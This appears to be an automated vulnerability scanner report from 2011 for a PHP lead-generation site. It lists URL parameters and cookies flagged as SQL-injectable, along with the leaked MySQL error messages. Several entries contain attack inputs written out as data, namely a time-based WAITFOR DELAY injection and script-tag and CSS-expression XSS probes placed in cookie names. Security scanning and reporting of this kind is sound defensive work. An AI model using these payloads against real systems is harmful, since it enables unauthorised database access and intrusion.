HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:23:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=t1q2r12fpjit0oedkjbhhb2986; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/bulo00'/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00'/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00' at line 5
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:23:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=gcrn384p657s3qlhcmhpbtk306; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/bulo00/project_dynamic_page_updated.php'?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php'?catId=30005&group=bulo00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:12:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=asdbkhubift16fnumoe3qcvcs4; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/bulo00/project_dynamic_page_updated.php?catId=30005'&group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005'&group=bulo00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=bulo00&template=3' OR prj.project_page_url = 'leadflow/bulo00/project_dyna' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:12:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pevj6lq6gt9hrmn4mqu7qotdd0; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00'&template=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?ca' at line 5
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:22:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1diac77cv0i6fnh2v5nejach66; path=/ Content-Length: 2502 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... flow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&templ/1'ate=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&templ/1'ate=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ate=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.p' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:12:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=41li08hi0bo4fj6ge9205djaa7; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3'' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&templa' at line 5
The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:05:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=k9vfcntif9td15p83i5elbrh71; path=/ Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/caad00/leadflow/caad00/project.php?ca'' OR prj.project_page_url = 'leadflow/caad00/leadflow/caad00/project.php?ca'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/leadflow/caad00/project.php?ca'/' union select prj.catId,prj.gr' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:57:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=seukppc4d9fsepoviarheguln4; path=/ Content-Length: 2286 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... d = prj.groupId where prj.project_page_url = 'leadflow/caad00/leadflow/caad00/project.php?catId=1;WAITFOR'' OR prj.project_page_url = 'leadflow/caad00/leadflow/caad00/project.php?catId=1;WAITFOR'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/leadflow/caad00/project.php?catId=1;WAITFOR'/' union select prj' at line 5
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the JSESSIONID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=eir6gsf5vi069bv5c9an2h9pq1; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4jcithjpoofk5kt7b25oq80a31; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=epo9po6akii3rg00eaobgqc6u2; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[%27] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[%27] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2kt2vvhd1hsgd8cr7vii2e0go5; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[//netsparker.com/n/n.css?0x001190] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[//netsparker.com/n/n.css?0x001190] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=mohr5c82mrioh2ih5uks9f4cp0; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[<script>ns(0x001197)</script>] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[<script>ns(0x001197)</script>] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pt5bianndj8idbus0459as1r15; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[NSFTW] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[NSFTW] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:42 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=e352ijjvnb0do57epaov4ts9g1; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[\'+NSFTW+\'] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[\'+NSFTW+\'] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:44 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ro5116utor68cfd53c4ok4p8d3; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=j953h7ggk7f51m5ajv6lbuds66; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[\'] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[\'] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=gc9e0vlbuhjmnp733jvm9c5g93; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[a08b960aNS_NO] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a08b960aNS_NO] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=eaqig2rp4bdcn9fld0dikvddk4; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8klvivlmbdq8ir8ujdgmf6r556; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[a08b960a] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a08b960a] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=gf7nq24u9jo17q6q8ph884vav2; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[a750dce4] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a750dce4] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:10 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qvu8pafkb6fgnpgamrdo2uh4c7; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[aca4086b] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[aca4086b] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=n9m1914ajtc9689fo8qd6o3kq2; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[ad01cc48] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[ad01cc48] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4f13v3fdesjn4aee1dapc2c420; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[body{x:expression(netsparker(0x00119B))}] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[body{x:expression(netsparker(0x00119B))}] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:50 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qnrdmgejv7b3ogmmlur3eq95k6; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
